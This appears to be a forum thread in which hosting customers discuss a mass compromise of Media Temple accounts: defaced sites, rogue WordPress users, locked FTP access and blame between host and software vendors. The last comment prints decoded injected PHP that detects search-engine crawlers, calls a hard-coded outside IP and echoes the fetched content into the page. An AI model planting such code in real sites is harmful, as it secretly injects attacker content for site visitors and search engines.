I had all my top domains defaced (joomla, wordpress and plain html sites, not only wordpress, so dont bother please with “hard your wordpress installation”).

The hacker did void the .htaccess and pulled in a index.html, a logo.ong and a flag.jpg file.

I searched thru the entire domains and it seems that nothing else has been touched, except for those strange guys in my wordpress users (johnnyA but others as well).

I spent half an hour to change ALL the passwords (root, ftp’s, emails, databases) and reconfigure them all.

I have to be honest: it seems to be a breach in the server, not in the software. But i am waiting for Mediatemple to clarify.
I have to be honest

Here is what I want to know, as this has never happened to me before and I am semi-computer illiterate:

Is my site dead and gone? If not, how do I regain access to it.

I am also locked out of my FTP account. I assume this is related.

Any help would be greatly appreciated.

Lots of info can be found here:

http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/

…with updates on the way.

Matt (mt)

I am unsure who is actually to blame for this exploit, if anyone is. I heave read that MediaTemple blames WordPress and WordPress blames MediaTemple. There are reports that Drupal sites have also been exploited, so the problem isn’t limited to WordPress only. WordPress has released an update in the last week, but I don’t see any evidence that this issue was addressed in the latest security fix.

This was not the fault of any software running on someone’s account. From what I understand, mt stored everyones passwords in plain text (ie. human readable) in their database, and it was this database itself that got hacked. This allowed hackers direct access via ftp and ssh to all of their clients accounts.

http://michaeltorbert.com/blog/media-temple-hacked/

If you do a search on Twitter right now for mediatemple you can see all the people affected. As of right now, as far as I know, they have not issued any official statement on this, let alone an apology.

The encoded PHP evaluates to this:

if(stripos($_SERVER['HTTP_USER_AGENT'], ‘google’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘yahoo’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘msn’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘live’))
{
$r = ”;
if($f=@fsockopen(’91.207.4.18′,80,$e,$er,10) and @fputs($f, “GET /linkit/in.php?domain=” . urlencode($_SERVER["SERVER_NAME"]) . “&useragent=” . urlencode($_SERVER['HTTP_USER_AGENT']) . ” HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n”))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,”\r\n\r\n”); echo substr($r,$p+4);
}